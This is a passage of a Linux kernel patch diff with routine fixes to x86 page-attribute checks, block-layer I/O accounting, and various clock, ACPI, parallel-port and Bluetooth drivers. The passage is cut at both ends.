+@@ -813,12 +848,13 @@ static int __should_split_large_page(pte_t *kpte, unsigned long address,
+ 	pgprot_t old_prot, new_prot, req_prot, chk_prot;
+ 	pte_t new_pte, *tmp;
+ 	enum pg_level level;
++	bool nx, rw;
+ 
+ 	/*
+ 	 * Check for races, another CPU might have split this page
+ 	 * up already:
+ 	 */
+-	tmp = _lookup_address_cpa(cpa, address, &level);
++	tmp = _lookup_address_cpa(cpa, address, &level, &nx, &rw);
+ 	if (tmp != kpte)
+ 		return 1;
+ 
+@@ -929,7 +965,8 @@ static int __should_split_large_page(pte_t *kpte, unsigned long address,
+ 	new_prot = static_protections(req_prot, lpaddr, old_pfn, numpages,
+ 				      psize, CPA_DETECT);
+ 
+-	new_prot = verify_rwx(old_prot, new_prot, lpaddr, old_pfn, numpages);
++	new_prot = verify_rwx(old_prot, new_prot, lpaddr, old_pfn, numpages,
++			      nx, rw);
+ 
+ 	/*
+ 	 * If there is a conflict, split the large page.
+@@ -1010,6 +1047,7 @@ __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address,
+ 	pte_t *pbase = (pte_t *)page_address(base);
+ 	unsigned int i, level;
+ 	pgprot_t ref_prot;
++	bool nx, rw;
+ 	pte_t *tmp;
+ 
+ 	spin_lock(&pgd_lock);
+@@ -1017,7 +1055,7 @@ __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address,
+ 	 * Check for races, another CPU might have split this page
+ 	 * up for us already:
+ 	 */
+-	tmp = _lookup_address_cpa(cpa, address, &level);
++	tmp = _lookup_address_cpa(cpa, address, &level, &nx, &rw);
+ 	if (tmp != kpte) {
+ 		spin_unlock(&pgd_lock);
+ 		return 1;
+@@ -1558,10 +1596,11 @@ static int __change_page_attr(struct cpa_data *cpa, int primary)
+ 	int do_split, err;
+ 	unsigned int level;
+ 	pte_t *kpte, old_pte;
++	bool nx, rw;
+ 
+ 	address = __cpa_addr(cpa, cpa->curpage);
+ repeat:
+-	kpte = _lookup_address_cpa(cpa, address, &level);
++	kpte = _lookup_address_cpa(cpa, address, &level, &nx, &rw);
+ 	if (!kpte)
+ 		return __cpa_process_fault(cpa, address, primary);
+ 
+@@ -1583,7 +1622,8 @@ static int __change_page_attr(struct cpa_data *cpa, int primary)
+ 		new_prot = static_protections(new_prot, address, pfn, 1, 0,
+ 					      CPA_PROTECT);
+ 
+-		new_prot = verify_rwx(old_prot, new_prot, address, pfn, 1);
++		new_prot = verify_rwx(old_prot, new_prot, address, pfn, 1,
++				      nx, rw);
+ 
+ 		new_prot = pgprot_clear_protnone_bits(new_prot);
+ 
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index d28e0987aa85b..ebb1b786591d5 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -42,7 +42,8 @@ KCOV_INSTRUMENT := n
+ # make up the standalone purgatory.ro
+ 
+ PURGATORY_CFLAGS_REMOVE := -mcmodel=kernel
+-PURGATORY_CFLAGS := -mcmodel=large -ffreestanding -fno-zero-initialized-in-bss -g0
++PURGATORY_CFLAGS := -mcmodel=small -ffreestanding -fno-zero-initialized-in-bss -g0
++PURGATORY_CFLAGS += -fpic -fvisibility=hidden
+ PURGATORY_CFLAGS += $(DISABLE_STACKLEAK_PLUGIN) -DDISABLE_BRANCH_PROFILING
+ PURGATORY_CFLAGS += -fno-stack-protector
+ 
+diff --git a/arch/x86/tools/relocs.c b/arch/x86/tools/relocs.c
+index 9a5b101c45023..4fd824a448245 100644
+--- a/arch/x86/tools/relocs.c
++++ b/arch/x86/tools/relocs.c
+@@ -746,6 +746,15 @@ static void walk_relocs(int (*process)(struct section *sec, Elf_Rel *rel,
+ 		if (!(sec_applies->shdr.sh_flags & SHF_ALLOC)) {
+ 			continue;
+ 		}
++
++		/*
++		 * Do not perform relocations in .notes sections; any
++		 * values there are meant for pre-boot consumption (e.g.
++		 * startup_xen).
++		 */
++		if (sec_applies->shdr.sh_type == SHT_NOTE)
++			continue;
++
+ 		sh_symtab = sec_symtab->symtab;
+ 		sym_strtab = sec_symtab->link->strtab;
+ 		for (j = 0; j < sec->shdr.sh_size/sizeof(Elf_Rel); j++) {
+diff --git a/arch/x86/um/shared/sysdep/archsetjmp.h b/arch/x86/um/shared/sysdep/archsetjmp.h
+index 166cedbab9266..8c81d1a604a94 100644
+--- a/arch/x86/um/shared/sysdep/archsetjmp.h
++++ b/arch/x86/um/shared/sysdep/archsetjmp.h
+@@ -1,6 +1,13 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __X86_UM_SYSDEP_ARCHSETJMP_H
++#define __X86_UM_SYSDEP_ARCHSETJMP_H
++
+ #ifdef __i386__
+ #include "archsetjmp_32.h"
+ #else
+ #include "archsetjmp_64.h"
+ #endif
++
++unsigned long get_thread_reg(int reg, jmp_buf *buf);
++
++#endif /* __X86_UM_SYSDEP_ARCHSETJMP_H */
+diff --git a/block/blk-core.c b/block/blk-core.c
+index aefdf07bdc2cf..a4155f123ab38 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -933,10 +933,11 @@ void update_io_ticks(struct block_device *part, unsigned long now, bool end)
+ 	unsigned long stamp;
+ again:
+ 	stamp = READ_ONCE(part->bd_stamp);
+-	if (unlikely(time_after(now, stamp))) {
+-		if (likely(try_cmpxchg(&part->bd_stamp, &stamp, now)))
+-			__part_stat_add(part, io_ticks, end ? now - stamp : 1);
+-	}
++	if (unlikely(time_after(now, stamp)) &&
++	    likely(try_cmpxchg(&part->bd_stamp, &stamp, now)) &&
++	    (end || part_in_flight(part)))
++		__part_stat_add(part, io_ticks, now - stamp);
++
+ 	if (part->bd_partno) {
+ 		part = bdev_whole(part);
+ 		goto again;
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index cc7f6a4a255c9..13a47b37acb7d 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -779,6 +779,8 @@ static void blk_account_io_merge_request(struct request *req)
+ 	if (blk_do_io_stat(req)) {
+ 		part_stat_lock();
+ 		part_stat_inc(req->part, merges[op_stat_group(req_op(req))]);
++		part_stat_local_dec(req->part,
++				    in_flight[op_is_write(req_op(req))]);
+ 		part_stat_unlock();
+ 	}
+ }
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index e1b12f3d54bd4..3afa5c8d165b1 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -971,17 +971,6 @@ bool blk_update_request(struct request *req, blk_status_t error,
+ }
+ EXPORT_SYMBOL_GPL(blk_update_request);
+ 
+-static void __blk_account_io_done(struct request *req, u64 now)
+-{
+-	const int sgrp = op_stat_group(req_op(req));
+-
+-	part_stat_lock();
+-	update_io_ticks(req->part, jiffies, true);
+-	part_stat_inc(req->part, ios[sgrp]);
+-	part_stat_add(req->part, nsecs[sgrp], now - req->start_time_ns);
+-	part_stat_unlock();
+-}
+-
+ static inline void blk_account_io_done(struct request *req, u64 now)
+ {
+ 	/*
+@@ -990,32 +979,39 @@ static inline void blk_account_io_done(struct request *req, u64 now)
+ 	 * containing request is enough.
+ 	 */
+ 	if (blk_do_io_stat(req) && req->part &&
+-	    !(req->rq_flags & RQF_FLUSH_SEQ))
+-		__blk_account_io_done(req, now);
+-}
+-
+-static void __blk_account_io_start(struct request *rq)
+-{
+-	/*
+-	 * All non-passthrough requests are created from a bio with one
+-	 * exception: when a flush command that is part of a flush sequence
+-	 * generated by the state machine in blk-flush.c is cloned onto the
+-	 * lower device by dm-multipath we can get here without a bio.
+-	 */
+-	if (rq->bio)
+-		rq->part = rq->bio->bi_bdev;
+-	else
+-		rq->part = rq->q->disk->part0;
++	    !(req->rq_flags & RQF_FLUSH_SEQ)) {
++		const int sgrp = op_stat_group(req_op(req));
+ 
+-	part_stat_lock();
+-	update_io_ticks(rq->part, jiffies, false);
+-	part_stat_unlock();
++		part_stat_lock();
++		update_io_ticks(req->part, jiffies, true);
++		part_stat_inc(req->part, ios[sgrp]);
++		part_stat_add(req->part, nsecs[sgrp], now - req->start_time_ns);
++		part_stat_local_dec(req->part,
++				    in_flight[op_is_write(req_op(req))]);
++		part_stat_unlock();
++	}
+ }
+ 
+ static inline void blk_account_io_start(struct request *req)
+ {
+-	if (blk_do_io_stat(req))
+-		__blk_account_io_start(req);
++	if (blk_do_io_stat(req)) {
++		/*
++		 * All non-passthrough requests are created from a bio with one
++		 * exception: when a flush command that is part of a flush sequence
++		 * generated by the state machine in blk-flush.c is cloned onto the
++		 * lower device by dm-multipath we can get here without a bio.
++		 */
++		if (req->bio)
++			req->part = req->bio->bi_bdev;
++		else
++			req->part = req->q->disk->part0;
++
++		part_stat_lock();
++		update_io_ticks(req->part, jiffies, false);
++		part_stat_local_inc(req->part,
++				    in_flight[op_is_write(req_op(req))]);
++		part_stat_unlock();
++	}
+ }
+ 
+ static inline void __blk_mq_end_request_acct(struct request *rq, u64 now)
+diff --git a/block/blk.h b/block/blk.h
+index a186ea20f39d8..9b2f53ff4c37f 100644
+--- a/block/blk.h
++++ b/block/blk.h
+@@ -346,6 +346,7 @@ static inline bool blk_do_io_stat(struct request *rq)
+ }
+ 
+ void update_io_ticks(struct block_device *part, unsigned long now, bool end);
++unsigned int part_in_flight(struct block_device *part);
+ 
+ static inline void req_set_nomerge(struct request_queue *q, struct request *req)
+ {
+diff --git a/block/genhd.c b/block/genhd.c
+index ddb17c4adc8a2..f9e3ecd5ba2fa 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -123,7 +123,7 @@ static void part_stat_read_all(struct block_device *part,
+ 	}
+ }
+ 
+-static unsigned int part_in_flight(struct block_device *part)
++unsigned int part_in_flight(struct block_device *part)
+ {
+ 	unsigned int inflight = 0;
+ 	int cpu;
+diff --git a/crypto/asymmetric_keys/Kconfig b/crypto/asymmetric_keys/Kconfig
+index 3df3fe4ed95fa..a7c09785f5727 100644
+--- a/crypto/asymmetric_keys/Kconfig
++++ b/crypto/asymmetric_keys/Kconfig
+@@ -84,5 +84,7 @@ config FIPS_SIGNATURE_SELFTEST
+ 	depends on KEYS
+ 	depends on ASYMMETRIC_KEY_TYPE
+ 	depends on PKCS7_MESSAGE_PARSER
++	depends on CRYPTO_RSA
++	depends on CRYPTO_SHA256
+ 
+ endif # ASYMMETRIC_KEY_TYPE
+diff --git a/drivers/accessibility/speakup/main.c b/drivers/accessibility/speakup/main.c
+index 45d906f17ea3d..10aa9c2ec400e 100644
+--- a/drivers/accessibility/speakup/main.c
++++ b/drivers/accessibility/speakup/main.c
+@@ -573,7 +573,7 @@ static u_long get_word(struct vc_data *vc)
+ 	}
+ 	attr_ch = get_char(vc, (u_short *)tmp_pos, &spk_attr);
+ 	buf[cnt++] = attr_ch;
+-	while (tmpx < vc->vc_cols - 1 && cnt < sizeof(buf) - 1) {
++	while (tmpx < vc->vc_cols - 1 && cnt < ARRAY_SIZE(buf) - 1) {
+ 		tmp_pos += 2;
+ 		tmpx++;
+ 		ch = get_char(vc, (u_short *)tmp_pos, &temp);
+diff --git a/drivers/acpi/acpi_lpss.c b/drivers/acpi/acpi_lpss.c
+index 8b44743945c8b..52af775ac1f16 100644
+--- a/drivers/acpi/acpi_lpss.c
++++ b/drivers/acpi/acpi_lpss.c
+@@ -319,6 +319,7 @@ static const struct lpss_device_desc bsw_i2c_dev_desc = {
+ 
+ static const struct property_entry bsw_spi_properties[] = {
+ 	PROPERTY_ENTRY_U32("intel,spi-pxa2xx-type", LPSS_BSW_SSP),
++	PROPERTY_ENTRY_U32("num-cs", 2),
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/acpica/Makefile b/drivers/acpi/acpica/Makefile
+index f919811156b1f..b6cf9c9bd6396 100644
+--- a/drivers/acpi/acpica/Makefile
++++ b/drivers/acpi/acpica/Makefile
+@@ -5,6 +5,7 @@
+ 
+ ccflags-y			:= -D_LINUX -DBUILDING_ACPICA
+ ccflags-$(CONFIG_ACPI_DEBUG)	+= -DACPI_DEBUG_OUTPUT
++CFLAGS_tbfind.o 		+= $(call cc-disable-warning, stringop-truncation)
+ 
+ # use acpi.o to put all files here into acpi.o modparam namespace
+ obj-y	+= acpi.o
+diff --git a/drivers/acpi/numa/srat.c b/drivers/acpi/numa/srat.c
+index b57de78fbf14f..a44c0761fd1c0 100644
+--- a/drivers/acpi/numa/srat.c
++++ b/drivers/acpi/numa/srat.c
+@@ -206,6 +206,11 @@ int __init srat_disabled(void)
+ 	return acpi_numa < 0;
+ }
+ 
++__weak int __init numa_fill_memblks(u64 start, u64 end)
++{
++	return NUMA_NO_MEMBLK;
++}
++
+ #if defined(CONFIG_X86) || defined(CONFIG_ARM64) || defined(CONFIG_LOONGARCH)
+ /*
+  * Callback for SLIT parsing.  pxm_to_node() returns NUMA_NO_NODE for
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index 959952e8ede38..220cedda2ca7d 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -2298,10 +2298,13 @@ static void __exit null_exit(void)
+ 
+ 	if (g_queue_mode == NULL_Q_MQ && shared_tags)
+ 		blk_mq_free_tag_set(&tag_set);
++
++	mutex_destroy(&lock);
+ }
+ 
+ module_init(null_init);
+ module_exit(null_exit);
+ 
+ MODULE_AUTHOR("Jens Axboe <axboe@kernel.dk>");
++MODULE_DESCRIPTION("multi queue aware block test driver");
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index a0fadde993d70..2dda94a0875a6 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -148,8 +148,10 @@ static int qca_read_fw_build_info(struct hci_dev *hdev)
+ 	}
+ 
+ 	build_label = kstrndup(&edl->data[1], build_lbl_len, GFP_KERNEL);
+-	if (!build_label)
++	if (!build_label) {
++		err = -ENOMEM;
+ 		goto out;
++	}
+ 
+ 	hci_set_fw_info(hdev, "%s", build_label);
+ 
+diff --git a/drivers/char/ppdev.c b/drivers/char/ppdev.c
+index 38b46c7d17371..a97edbf7455a6 100644
+--- a/drivers/char/ppdev.c
++++ b/drivers/char/ppdev.c
+@@ -296,28 +296,35 @@ static int register_device(int minor, struct pp_struct *pp)
+ 	if (!port) {
+ 		pr_warn("%s: no associated port!\n", name);
+ 		rc = -ENXIO;
+-		goto err;
++		goto err_free_name;
++	}
++
++	index = ida_alloc(&ida_index, GFP_KERNEL);
++	if (index < 0) {
++		pr_warn("%s: failed to get index!\n", name);
++		rc = index;
++		goto err_put_port;
+ 	}
+ 
+-	index = ida_simple_get(&ida_index, 0, 0, GFP_KERNEL);
+ 	memset(&ppdev_cb, 0, sizeof(ppdev_cb));
+ 	ppdev_cb.irq_func = pp_irq;
+ 	ppdev_cb.flags = (pp->flags & PP_EXCL) ? PARPORT_FLAG_EXCL : 0;
+ 	ppdev_cb.private = pp;
+ 	pdev = parport_register_dev_model(port, name, &ppdev_cb, index);
+-	parport_put_port(port);
+ 
+ 	if (!pdev) {
+ 		pr_warn("%s: failed to register device!\n", name);
+ 		rc = -ENXIO;
+-		ida_simple_remove(&ida_index, index);
+-		goto err;
++		ida_free(&ida_index, index);
++		goto err_put_port;
+ 	}
+ 
+ 	pp->pdev = pdev;
+ 	pp->index = index;
+ 	dev_dbg(&pdev->dev, "registered pardevice\n");
+-err:
++err_put_port:
++	parport_put_port(port);
++err_free_name:
+ 	kfree(name);
+ 	return rc;
+ }
+@@ -750,7 +757,7 @@ static int pp_release(struct inode *inode, struct file *file)
+ 
+ 	if (pp->pdev) {
+ 		parport_unregister_device(pp->pdev);
+-		ida_simple_remove(&ida_index, pp->index);
++		ida_free(&ida_index, pp->index);
+ 		pp->pdev = NULL;
+ 		pr_debug(CHRDEV "%x: unregistered pardevice\n", minor);
+ 	}
+diff --git a/drivers/clk/clk-renesas-pcie.c b/drivers/clk/clk-renesas-pcie.c
+index 35b2519f16961..bba0e7c667dc1 100644
+--- a/drivers/clk/clk-renesas-pcie.c
++++ b/drivers/clk/clk-renesas-pcie.c
+@@ -24,10 +24,12 @@
+ #define RS9_REG_SS_AMP_0V7			0x1
+ #define RS9_REG_SS_AMP_0V8			0x2
+ #define RS9_REG_SS_AMP_0V9			0x3
++#define RS9_REG_SS_AMP_DEFAULT			RS9_REG_SS_AMP_0V8
+ #define RS9_REG_SS_AMP_MASK			0x3
+ #define RS9_REG_SS_SSC_100			0
+ #define RS9_REG_SS_SSC_M025			(1 << 3)
+ #define RS9_REG_SS_SSC_M050			(3 << 3)
++#define RS9_REG_SS_SSC_DEFAULT			RS9_REG_SS_SSC_100
+ #define RS9_REG_SS_SSC_MASK			(3 << 3)
+ #define RS9_REG_SS_SSC_LOCK			BIT(5)
+ #define RS9_REG_SR				0x2
+@@ -196,8 +198,8 @@ static int rs9_get_common_config(struct rs9_driver_data *rs9)
+ 	int ret;
+ 
+ 	/* Set defaults */
+-	rs9->pll_amplitude = RS9_REG_SS_AMP_0V7;
+-	rs9->pll_ssc = RS9_REG_SS_SSC_100;
++	rs9->pll_amplitude = RS9_REG_SS_AMP_DEFAULT;
++	rs9->pll_ssc = RS9_REG_SS_SSC_DEFAULT;
+ 
+ 	/* Output clock amplitude */
+ 	ret = of_property_read_u32(np, "renesas,out-amplitude-microvolt",
+@@ -238,13 +240,13 @@ static void rs9_update_config(struct rs9_driver_data *rs9)
+ 	int i;
+ 
+ 	/* If amplitude is non-default, update it. */
+-	if (rs9->pll_amplitude != RS9_REG_SS_AMP_0V7) {
++	if (rs9->pll_amplitude != RS9_REG_SS_AMP_DEFAULT) {
+ 		regmap_update_bits(rs9->regmap, RS9_REG_SS, RS9_REG_SS_AMP_MASK,
+ 				   rs9->pll_amplitude);
+ 	}
+ 
+ 	/* If SSC is non-default, update it. */
+-	if (rs9->pll_ssc != RS9_REG_SS_SSC_100) {
++	if (rs9->pll_ssc != RS9_REG_SS_SSC_DEFAULT) {
+ 		regmap_update_bits(rs9->regmap, RS9_REG_SS, RS9_REG_SS_SSC_MASK,
+ 				   rs9->pll_ssc);
+ 	}
+diff --git a/drivers/clk/mediatek/clk-mt8365-mm.c b/drivers/clk/mediatek/clk-mt8365-mm.c
+index 22c75a03a6452..bc0b1162ed431 100644
+--- a/drivers/clk/mediatek/clk-mt8365-mm.c
++++ b/drivers/clk/mediatek/clk-mt8365-mm.c
+@@ -53,7 +53,7 @@ static const struct mtk_gate mm_clks[] = {
+ 	GATE_MM0(CLK_MM_MM_DSI0, "mm_dsi0", "mm_sel", 17),
+ 	GATE_MM0(CLK_MM_MM_DISP_RDMA1, "mm_disp_rdma1", "mm_sel", 18),
+ 	GATE_MM0(CLK_MM_MM_MDP_RDMA1, "mm_mdp_rdma1", "mm_sel", 19),
+-	GATE_MM0(CLK_MM_DPI0_DPI0, "mm_dpi0_dpi0", "vpll_dpix", 20),
++	GATE_MM0(CLK_MM_DPI0_DPI0, "mm_dpi0_dpi0", "dpi0_sel", 20),
+ 	GATE_MM0(CLK_MM_MM_FAKE, "mm_fake", "mm_sel", 21),
+ 	GATE_MM0(CLK_MM_MM_SMI_COMMON, "mm_smi_common", "mm_sel", 22),
+ 	GATE_MM0(CLK_MM_MM_SMI_LARB0, "mm_smi_larb0", "mm_sel", 23),
+diff --git a/drivers/clk/qcom/dispcc-sm6350.c b/drivers/clk/qcom/dispcc-sm6350.c
+index ea6f54ed846ec..441f042f5ea45 100644
+--- a/drivers/clk/qcom/dispcc-sm6350.c
++++ b/drivers/clk/qcom/dispcc-sm6350.c
+@@ -221,26 +221,17 @@ static struct clk_rcg2 disp_cc_mdss_dp_crypto_clk_src = {
+ 	},
+ };
+ 
+-static const struct freq_tbl ftbl_disp_cc_mdss_dp_link_clk_src[] = {
+-	F(162000, P_DP_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(270000, P_DP_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(540000, P_DP_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(810000, P_DP_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	{ }
+-};
+-
+ static struct clk_rcg2 disp_cc_mdss_dp_link_clk_src = {
+ 	.cmd_rcgr = 0x10f8,
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_0,
+-	.freq_tbl = ftbl_disp_cc_mdss_dp_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data){
+ 		.name = "disp_cc_mdss_dp_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_0,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_0),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/dispcc-sm8450.c b/drivers/clk/qcom/dispcc-sm8450.c
+index 64626f620a01b..e7dd45a2058c1 100644
+--- a/drivers/clk/qcom/dispcc-sm8450.c
++++ b/drivers/clk/qcom/dispcc-sm8450.c
+@@ -309,26 +309,17 @@ static struct clk_rcg2 disp_cc_mdss_dptx0_aux_clk_src = {
+ 	},
+ };
+ 
+-static const struct freq_tbl ftbl_disp_cc_mdss_dptx0_link_clk_src[] = {
+-	F(162000, P_DP0_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(270000, P_DP0_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(540000, P_DP0_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	F(810000, P_DP0_PHY_PLL_LINK_CLK, 1, 0, 0),
+-	{ }
+-};
+-
+ static struct clk_rcg2 disp_cc_mdss_dptx0_link_clk_src = {
+ 	.cmd_rcgr = 0x819c,
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_3,
+-	.freq_tbl = ftbl_disp_cc_mdss_dptx0_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data) {
+ 		.name = "disp_cc_mdss_dptx0_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_3,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_3),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+@@ -382,13 +373,12 @@ static struct clk_rcg2 disp_cc_mdss_dptx1_link_clk_src = {
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_3,
+-	.freq_tbl = ftbl_disp_cc_mdss_dptx0_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data) {
+ 		.name = "disp_cc_mdss_dptx1_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_3,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_3),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+@@ -442,13 +432,12 @@ static struct clk_rcg2 disp_cc_mdss_dptx2_link_clk_src = {
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_3,
+-	.freq_tbl = ftbl_disp_cc_mdss_dptx0_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data) {
+ 		.name = "disp_cc_mdss_dptx2_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_3,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_3),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+@@ -502,13 +491,12 @@ static struct clk_rcg2 disp_cc_mdss_dptx3_link_clk_src = {
+ 	.mnd_width = 0,
+ 	.hid_width = 5,
+ 	.parent_map = disp_cc_parent_map_3,
+-	.freq_tbl = ftbl_disp_cc_mdss_dptx0_link_clk_src,
+ 	.clkr.hw.init = &(struct clk_init_data) {
+ 		.name = "disp_cc_mdss_dptx3_link_clk_src",
+ 		.parent_data = disp_cc_parent_data_3,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_3),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_byte2_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/mmcc-msm8998.c b/drivers/clk/qcom/mmcc-msm8998.c
+index e5a72c2f080f8..c282424bac537 100644
+--- a/drivers/clk/qcom/mmcc-msm8998.c
++++ b/drivers/clk/qcom/mmcc-msm8998.c
+@@ -2578,6 +2578,8 @@ static struct clk_hw *mmcc_msm8998_hws[] = {
+ 
+ static struct gdsc video_top_gdsc = {
+ 	.gdscr = 0x1024,
++	.cxcs = (unsigned int []){ 0x1028, 0x1034, 0x1038 },
++	.cxc_count = 3,
+ 	.pd = {
+ 		.name = "video_top",
+ 	},
+@@ -2586,20 +2588,26 @@ static struct gdsc video_top_gdsc = {
+ 
+ static struct gdsc video_subcore0_gdsc = {
+ 	.gdscr = 0x1040,
++	.cxcs = (unsigned int []){ 0x1048 },
++	.cxc_count = 1,
+ 	.pd = {
+ 		.name = "video_subcore0",
+ 	},
+ 	.parent = &video_top_gdsc.pd,
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.flags = HW_CTRL,
+ };
+ 
+ static struct gdsc video_subcore1_gdsc = {
+ 	.gdscr = 0x1044,
++	.cxcs = (unsigned int []){ 0x104c },
++	.cxc_count = 1,
+ 	.pd = {
+ 		.name = "video_subcore1",
+ 	},
+ 	.parent = &video_top_gdsc.pd,
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.flags = HW_CTRL,
+ };
+ 
+ static struct gdsc mdss_gdsc = {
+diff --git a/drivers/clk/renesas/r8a779a0-cpg-mssr.c b/drivers/clk/renesas/r8a779a0-cpg-mssr.c
+index e02542ca24a06..5c908c8c5180d 100644
+--- a/drivers/clk/renesas/r8a779a0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779a0-cpg-mssr.c
+@@ -139,7 +139,7 @@ static const struct mssr_mod_clk r8a779a0_mod_clks[] __initconst = {
+ 	DEF_MOD("avb3",		214,	R8A779A0_CLK_S3D2),
+ 	DEF_MOD("avb4",		215,	R8A779A0_CLK_S3D2),
+ 	DEF_MOD("avb5",		216,	R8A779A0_CLK_S3D2),
+-	DEF_MOD("canfd0",	328,	R8A779A0_CLK_CANFD),
++	DEF_MOD("canfd0",	328,	R8A779A0_CLK_S3D2),
+ 	DEF_MOD("csi40",	331,	R8A779A0_CLK_CSI0),
+ 	DEF_MOD("csi41",	400,	R8A779A0_CLK_CSI0),
+ 	DEF_MOD("csi42",	401,	R8A779A0_CLK_CSI0),
+diff --git a/drivers/clk/renesas/r9a07g043-cpg.c b/drivers/clk/renesas/r9a07g043-cpg.c
+index 37475465100de..0b56688ecbfc4 100644
+--- a/drivers/clk/renesas/r9a07g043-cpg.c
++++ b/drivers/clk/renesas/r9a07g043-cpg.c
+@@ -252,6 +252,10 @@ static struct rzg2l_mod_clk r9a07g043_mod_clks[] = {
+ 				0x5a8, 1),
+ 	DEF_MOD("tsu_pclk",	R9A07G043_TSU_PCLK, R9A07G043_CLK_TSU,
+ 				0x5ac, 0),
++#ifdef CONFIG_RISCV
++	DEF_MOD("nceplic_aclk",	R9A07G043_NCEPLIC_ACLK, R9A07G043_CLK_P1,
++				0x608, 0),
++#endif
+ };
+ 
+ static struct rzg2l_reset r9a07g043_resets[] = {
+@@ -305,6 +309,10 @@ static struct rzg2l_reset r9a07g043_resets[] = {
+ 	DEF_RST(R9A07G043_ADC_PRESETN, 0x8a8, 0),
+ 	DEF_RST(R9A07G043_ADC_ADRST_N, 0x8a8, 1),
+ 	DEF_RST(R9A07G043_TSU_PRESETN, 0x8ac, 0),
++#ifdef CONFIG_RISCV
++	DEF_RST(R9A07G043_NCEPLIC_ARESETN, 0x908, 0),
++#endif
++
+ };
+ 
+ static const unsigned int r9a07g043_crit_mod_clks[] __initconst = {
+@@ -314,6 +322,7 @@ static const unsigned int r9a07g043_crit_mod_clks[] __initconst = {
+ #endif
+ #ifdef CONFIG_RISCV
+ 	MOD_CLK_BASE + R9A07G043_IAX45_CLK,
++	MOD_CLK_BASE + R9A07G043_NCEPLIC_ACLK,
+ #endif
+ 	MOD_CLK_BASE + R9A07G043_DMAC_ACLK,
+ };
+diff --git a/drivers/clk/samsung/clk-exynosautov9.c b/drivers/clk/samsung/clk-exynosautov9.c
+index 7b16320bba667..c360639562755 100644
+--- a/drivers/clk/samsung/clk-exynosautov9.c
++++ b/drivers/clk/samsung/clk-exynosautov9.c
+@@ -343,13 +343,13 @@ static const struct samsung_pll_clock top_pll_clks[] __initconst = {
+ 	/* CMU_TOP_PURECLKCOMP */
+ 	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared0_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED0, PLL_CON3_PLL_SHARED0, NULL),
+-	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared1_pll", "oscclk",
++	PLL(pll_0822x, FOUT_SHARED1_PLL, "fout_shared1_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED1, PLL_CON3_PLL_SHARED1, NULL),
+-	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared2_pll", "oscclk",
++	PLL(pll_0822x, FOUT_SHARED2_PLL, "fout_shared2_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED2, PLL_CON3_PLL_SHARED2, NULL),
+-	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared3_pll", "oscclk",
